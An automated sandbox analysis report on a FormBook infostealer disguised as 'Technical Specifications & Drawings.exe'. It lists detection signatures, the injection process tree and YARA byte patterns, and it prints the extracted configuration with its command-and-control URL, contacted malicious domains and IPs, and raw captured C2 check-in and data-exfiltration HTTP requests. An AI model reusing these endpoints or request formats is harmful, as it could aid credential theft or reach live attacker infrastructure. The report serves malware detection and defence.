
Windows Analysis Report
Technical Specifications & Drawings.exe

Overview

General Information

Sample Name: Technical Specifications & Drawings.exe
Analysis ID: 680337
MD5: 9b94f751e8cc145058db9f428c2ad571
SHA1: f12af989efe2b3b11e4784899ca4c6794da17879
SHA256: 893a0b655917a18e5886348b39f6023fa851cf3d89e5b8709219ad3d2766fa97
Tags: exe, Formbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • Technical Specifications & Drawings.exe (PID: 6080 cmdline: "C:\Users\user\Desktop\Technical Specifications & Drawings.exe" MD5: 9B94F751E8CC145058DB9F428C2AD571)
    • Technical Specifications & Drawings.exe (PID: 5084 cmdline: C:\Users\user\Desktop\Technical Specifications & Drawings.exe MD5: 9B94F751E8CC145058DB9F428C2AD571)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 1896 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
  • cleanup
{"C2 list": ["www.tomoptique.fr/02pi/"], "decoy": ["M3tfGJmJRxnXx2v38A==", "m4b8szAh7fn1GFTQt32C+uKxPpY=", "aq5+I6igUigQzHUz", "4lHg1pN4fbZQ8Hg5", "pZgq+XdYRJZGtZpXb/gobxk=", "ngmngHIN+PJf3danjt0=", "aWHnw0nyXCgQzHUz", "Qa+KQe7PL5g83V8q", "lX0/3lMZHyGWQPyVm46Q9eKxPpY=", "syPESuXcWyQQzHUz", "ULeDOo1rfqvVcCs=", "COFEArOnRS4JMdemgP8DLQqSNA==", "OqdvdWhJyOqVPg==", "ANt3czoMin1DUZcstDUe", "rKFuM+S9pv/riVlgxBgU", "xzso55N63kL1Ltanjt0=", "hu2RdTMU7NZL0ZeqvEGH7OKxPpY=", "phmUZhkO/d6ZTx6mWMQ=", "Wj2oYxTKjw68jMwazrQW", "lv2aiTsU6N7OqJUTBj2Y+uKxPpY=", "5L0q4IlGEpRTlSYstDUe", "FvK8ah8qZ6vVcCs=", "abtoVRsE4tE6sNIRwiGUA+KxPpY=", "y8Gdr3IxeuRASI4Jy+8KaA==", "N7Em3E0iRrJy3danjt0=", "OBWvoWlwJbCSGdanjt0=", "kHkzKtyb51bk65cS+g==", "BVkF/LV3JBY+srgvS9U=", "fd2hjkcgFnNDp9ilV9U=", "edamUMWCAMievvdJA4WztmMX", "h/qtrJyTWSJL/PxJHlLzWAg=", "kWe7Ro0IyOqVPg==", "QrAe3YpmUGlDSXfy/wMvSTmfNg==", "ZWHgx4I+k/iuEUaNFmBIl0c0Hiy9", "iPlzLaJyecBx3tanjt0=", "Fo9S+XIwpyB1byMstDUe", "SkLiwnZYrCYQrGBeaKYibhE=", "XcysZNaTMwWxq2OmTRULYA==", "aNu4UwbkA17EoBLXgP02mT00Hiy9", "Mo8yuSKja+g9", "607Ad/rXD5aMLt2xfIZ2e1NnoZ4=", "pXk25GIbEhR4+i13QkI+STmfNg==", "uysGFdukYWM8/QtMBEyc/uKxPpY=", "fmH+9tKRYRD/oVthN3aztmMX", "TbWDRDb0g9Ciq2OmTRULYA==", "tqF7KKme4y7gKNanjt0=", "6+CEgnJVgQLuirED1LIRexM=", "YFTOiPnMSI9rJw==", "k/yeppGCO9fBv/c8", "Kqk+FsSThJHxaSMiNY+ztmMX", "HezQg/rXDY51FtXgrAd8lkv0sCmtHTtGnw==", "GWjsvjb3CHtxvjlKOYiztmMX", "QCnkguifwkk/mCkstDUe", "zTm3ZwwBFoJjoigstDUe", "4VQ4+q5U0aUIx2v38A==", "7c038ndW7jMCtjw=", "8d6NjFQhZqvVcCs=", "xqJFQfyja+g9", "iHDxwkgzyOqVPg==", "OSu/mIgimCB8X9MWJixbvWOuqdoDwaU=", "Sq1WTzwwyOqVPg==", "huZUE5ZZNtqY/wlhy+8KaA==", "g27epFQnkhaSqe1sRB2ztmMX", "b9WRoY5wEffprIkPy+8KaA=="]}
Source | Rule | Description | Author | Strings
Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
    Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    • 0x65b1:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1dbe0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa53f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x16de7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x16be5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x16691:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x16ce7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x16e5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa10a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x158ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xae52:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1c837:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1d94a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    • 0x19289:$sqlite3step: 68 34 1C 7B E1
    • 0x193bc:$sqlite3step: 68 34 1C 7B E1
    • 0x192cb:$sqlite3text: 68 38 2A 90 C5
    • 0x19413:$sqlite3text: 68 38 2A 90 C5
    • 0x192e2:$sqlite3blob: 68 53 D8 7F 8C
    • 0x19435:$sqlite3blob: 68 53 D8 7F 8C
    Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
      Source | Rule | Description | Author | Strings
      Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
        Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
        • 0x57b1:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x1cde0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x973f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x15fe7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        • 0x15de5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15891:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15ee7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1605f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x930a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x14aac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa052:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ba37:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1cb4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        • 0x18489:$sqlite3step: 68 34 1C 7B E1
        • 0x185bc:$sqlite3step: 68 34 1C 7B E1
        • 0x184cb:$sqlite3text: 68 38 2A 90 C5
        • 0x18613:$sqlite3text: 68 38 2A 90 C5
        • 0x184e2:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18635:$sqlite3blob: 68 53 D8 7F 8C
        Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
          No Sigma rule has matched
          Timestamp: 08/08/22-12:28:44.161490
          Source IP: 192.168.2.3
          Destination IP: 67.23.226.119
          SID: 2031412
          Source Port: 49803
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected
          Timestamp: 08/08/22-12:28:44.161490
          Source IP: 192.168.2.3
          Destination IP: 67.23.226.119
          SID: 2031453
          Source Port: 49803
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected
          Timestamp: 08/08/22-12:28:49.631208
          Source IP: 192.168.2.3
          Destination IP: 67.223.117.72
          SID: 2031449
          Source Port: 49809
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected
          Timestamp: 08/08/22-12:28:49.631208
          Source IP: 192.168.2.3
          Destination IP: 67.223.117.72
          SID: 2031412
          Source Port: 49809
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected
          Timestamp: 08/08/22-12:28:49.631208
          Source IP: 192.168.2.3
          Destination IP: 67.223.117.72
          SID: 2031453
          Source Port: 49809
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected
          Timestamp: 08/08/22-12:28:44.161490
          Source IP: 192.168.2.3
          Destination IP: 67.23.226.119
          SID: 2031449
          Source Port: 49803
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected


          AV Detection

          Source: Technical Specifications & Drawings.exe | Virustotal: Detection: 32%
          Source: Technical Specifications & Drawings.exe | ReversingLabs: Detection: 21%
          Source: Yara matchFile source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: http://www.kirchhoff-darryl.com/02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_Avira URL Cloud: Label: malware
          Source: http://www.tomoptique.fr/02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_Avira URL Cloud: Label: malware
          Source: http://www.mexc-event-partner.site/02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_Avira URL Cloud: Label: malware
          Source: http://www.esandcraic.com/02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_Avira URL Cloud: Label: malware
          Source: http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91Avira URL Cloud: Label: malware
          Source: http://www.mexc-event-partner.site/02pi/Avira URL Cloud: Label: malware
          Source: www.tomoptique.fr/02pi/Avira URL Cloud: Label: malware
          Source: boshi-eg.online | Virustotal: Detection: 12%
          Source: mexc-event-partner.site | Virustotal: Detection: 5%
          Source: Technical Specifications & Drawings.exeJoe Sandbox ML: detected
          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.tomoptique.fr/02pi/"], "decoy": ["M3tfGJmJRxnXx2v38A==", "m4b8szAh7fn1GFTQt32C+uKxPpY=", "aq5+I6igUigQzHUz", "4lHg1pN4fbZQ8Hg5", "pZgq+XdYRJZGtZpXb/gobxk=", "ngmngHIN+PJf3danjt0=", "aWHnw0nyXCgQzHUz", "Qa+KQe7PL5g83V8q", "lX0/3lMZHyGWQPyVm46Q9eKxPpY=", "syPESuXcWyQQzHUz", "ULeDOo1rfqvVcCs=", "COFEArOnRS4JMdemgP8DLQqSNA==", "OqdvdWhJyOqVPg==", "ANt3czoMin1DUZcstDUe", "rKFuM+S9pv/riVlgxBgU", "xzso55N63kL1Ltanjt0=", "hu2RdTMU7NZL0ZeqvEGH7OKxPpY=", "phmUZhkO/d6ZTx6mWMQ=", "Wj2oYxTKjw68jMwazrQW", "lv2aiTsU6N7OqJUTBj2Y+uKxPpY=", "5L0q4IlGEpRTlSYstDUe", "FvK8ah8qZ6vVcCs=", "abtoVRsE4tE6sNIRwiGUA+KxPpY=", "y8Gdr3IxeuRASI4Jy+8KaA==", "N7Em3E0iRrJy3danjt0=", "OBWvoWlwJbCSGdanjt0=", "kHkzKtyb51bk65cS+g==", "BVkF/LV3JBY+srgvS9U=", "fd2hjkcgFnNDp9ilV9U=", "edamUMWCAMievvdJA4WztmMX", "h/qtrJyTWSJL/PxJHlLzWAg=", "kWe7Ro0IyOqVPg==", "QrAe3YpmUGlDSXfy/wMvSTmfNg==", "ZWHgx4I+k/iuEUaNFmBIl0c0Hiy9", "iPlzLaJyecBx3tanjt0=", "Fo9S+XIwpyB1byMstDUe", "SkLiwnZYrCYQrGBeaKYibhE=", "XcysZNaTMwWxq2OmTRULYA==", "aNu4UwbkA17EoBLXgP02mT00Hiy9", "Mo8yuSKja+g9", "607Ad/rXD5aMLt2xfIZ2e1NnoZ4=", "pXk25GIbEhR4+i13QkI+STmfNg==", "uysGFdukYWM8/QtMBEyc/uKxPpY=", "fmH+9tKRYRD/oVthN3aztmMX", "TbWDRDb0g9Ciq2OmTRULYA==", "tqF7KKme4y7gKNanjt0=", "6+CEgnJVgQLuirED1LIRexM=", "YFTOiPnMSI9rJw==", "k/yeppGCO9fBv/c8", "Kqk+FsSThJHxaSMiNY+ztmMX", "HezQg/rXDY51FtXgrAd8lkv0sCmtHTtGnw==", "GWjsvjb3CHtxvjlKOYiztmMX", "QCnkguifwkk/mCkstDUe", "zTm3ZwwBFoJjoigstDUe", "4VQ4+q5U0aUIx2v38A==", "7c038ndW7jMCtjw=", "8d6NjFQhZqvVcCs=", "xqJFQfyja+g9", "iHDxwkgzyOqVPg==", "OSu/mIgimCB8X9MWJixbvWOuqdoDwaU=", "Sq1WTzwwyOqVPg==", "huZUE5ZZNtqY/wlhy+8KaA==", "g27epFQnkhaSqe1sRB2ztmMX", "b9WRoY5wEffprIkPy+8KaA=="]}
          Source: Technical Specifications & Drawings.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Technical Specifications & Drawings.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: Technical Specifications & Drawings.exe, 00000004.00000003.260883902.000000000144C000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000003.262790961.00000000015E3000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.349077296.000000000423C000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.346500614.000000000409E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.515758890.00000000044EF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.513604126.00000000043D0000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Technical Specifications & Drawings.exe, Technical Specifications & Drawings.exe, 00000004.00000003.260883902.000000000144C000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000003.262790961.00000000015E3000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.349077296.000000000423C000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.346500614.000000000409E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.515758890.00000000044EF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.513604126.00000000043D0000.00000040.00000800.00020000.00000000.sdmp

          Networking

          Source: C:\Windows\explorer.exeNetwork Connect: 109.234.162.62 80
          Source: C:\Windows\explorer.exeDomain query: www.mexc-event-partner.site
          Source: C:\Windows\explorer.exeDomain query: www.gzkanglongkeji.com
          Source: C:\Windows\explorer.exeNetwork Connect: 107.155.208.43 80
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.107.80 80
          Source: C:\Windows\explorer.exeNetwork Connect: 67.23.226.119 80
          Source: C:\Windows\explorer.exeDomain query: www.kirchhoff-darryl.com
          Source: C:\Windows\explorer.exeNetwork Connect: 67.223.117.72 80
          Source: C:\Windows\explorer.exeDomain query: www.boshi-eg.online
          Source: C:\Windows\explorer.exeDomain query: www.tomoptique.fr
          Source: C:\Windows\explorer.exeDomain query: www.esandcraic.com
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49803 -> 67.23.226.119:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49803 -> 67.23.226.119:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49803 -> 67.23.226.119:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49809 -> 67.223.117.72:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49809 -> 67.223.117.72:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49809 -> 67.223.117.72:80
          Source: Malware configuration extractorURLs: www.tomoptique.fr/02pi/
          Source: Joe Sandbox ViewASN Name: O2SWITCHFR O2SWITCHFR
          Source: Joe Sandbox ViewASN Name: BEKKOAMEBEKKOAMEINTERNETINCJP BEKKOAMEBEKKOAMEINTERNETINCJP
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_ HTTP/1.1Host: www.kirchhoff-darryl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_ HTTP/1.1Host: www.tomoptique.frConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=4npjF3s9G6uWNp4ceBGqcNUcjkX96JEG8J4d3OAuWw45Kxpl9gSb2BHY5Eg4Nc6InaukRaYVJuT4y0aleUHPUlqgoOBFmRDZHQ==&wRtdp=ETVPg0_ HTTP/1.1Host: www.boshi-eg.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_ HTTP/1.1Host: www.esandcraic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_ HTTP/1.1Host: www.mexc-event-partner.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 67.223.117.72 67.223.117.72
          Source: Joe Sandbox ViewIP Address: 67.23.226.119 67.23.226.119
          Source: global trafficHTTP traffic detected: POST /02pi/ HTTP/1.1Host: www.mexc-event-partner.siteConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.mexc-event-partner.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mexc-event-partner.site/02pi/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 5a 4c 30 3d 44 76 79 6b 59 68 57 49 4d 35 4c 42 4a 6a 4d 50 6a 54 75 63 62 57 6d 55 44 47 6a 73 66 32 46 4f 72 53 64 48 57 70 34 47 61 33 74 68 66 6a 38 75 79 5f 54 78 59 47 53 44 75 33 62 4c 39 42 7a 62 39 47 57 70 74 79 46 63 62 75 70 69 6f 68 6f 32 6d 5a 51 56 77 5a 7e 45 62 35 42 51 71 64 43 78 66 72 6f 78 42 49 62 70 39 44 47 75 43 31 5a 30 69 52 7a 49 4d 53 7a 7a 32 78 43 77 6d 76 61 52 4e 31 7a 49 62 44 50 49 4d 5f 62 72 31 33 36 6b 6d 7a 39 35 4e 67 61 62 55 51 4a 31 6b 50 63 62 41 55 71 63 37 55 45 52 32 73 48 51 55 66 46 65 5a 46 4f 7a 35 4e 4e 35 7a 68 6b 4a 6b 50 6b 35 57 53 37 6a 28 47 52 42 41 71 49 7a 64 74 78 42 54 72 46 39 36 4c 77 2d 57 32 63 52 66 32 63 57 74 31 28 5f 4b 43 54 63 65 35 74 43 76 64 59 53 45 5f 6f 36 59 31 59 2d 41 79 45 43 4f 36 6e 73 66 6e 71 72 39 4d 35 34 6d 44 79 6f 39 47 71 66 4f 48 6c 58 37 74 41 41 7a 32 51 4a 71 51 41 63 33 52 49 4f 45 2d 42 64 71 4a 48 6c 69 37 6b 68 41 6c 45 4f 6d 68 6a 72 35 37 6b 71 6e 4e 55 6f 6e 4e 66 4f 51 70 48 43 58 79 67 71 66 58 67 68 77 34 71 52 56 47 6c 61 38 50 50 57 5a 63 4c 6c 7e 38 65 44 72 52 57 79 48 4a 59 70 30 53 4a 41 56 59 6c 76 6d 33 33 33 6c 6f 4f 2d 6b 6b 54 2d 63 69 57 52 79 36 54 35 7a 51 79 71 52 6f 44 4c 6d 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
ZL0=DvykYhWIM5LBJjMPjTucbWmUDGjsf2FOrSdHWp4Ga3thfj8uy_TxYGSDu3bL9Bzb9GWptyFcbupioho2mZQVwZ~Eb5BQqdCxfroxBIbp9DGuC1Z0iRzIMSzz2xCwmvaRN1zIbDPIM_br136kmz95NgabUQJ1kPcbAUqc7UER2sHQUfFeZFOz5NN5zhkJkPk5WS7j(GRBAqIzdtxBTrF96Lw-W2cRf2cWt1(_KCTce5tCvdYSE_o6Y1Y-AyECO6nsfnqr9M54mDyo9GqfOHlX7tAAz2QJqQAc3RIOE-BdqJHli7khAlEOmhjr57kqnNUonNfOQpHCXygqfXghw4qRVGla8PPWZcLl~8eDrRWyHJYp0SJAVYlvm333loO-kkT-ciWRy6T5zQyqRoDLmA).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 10:28:44 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 10:28:49 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 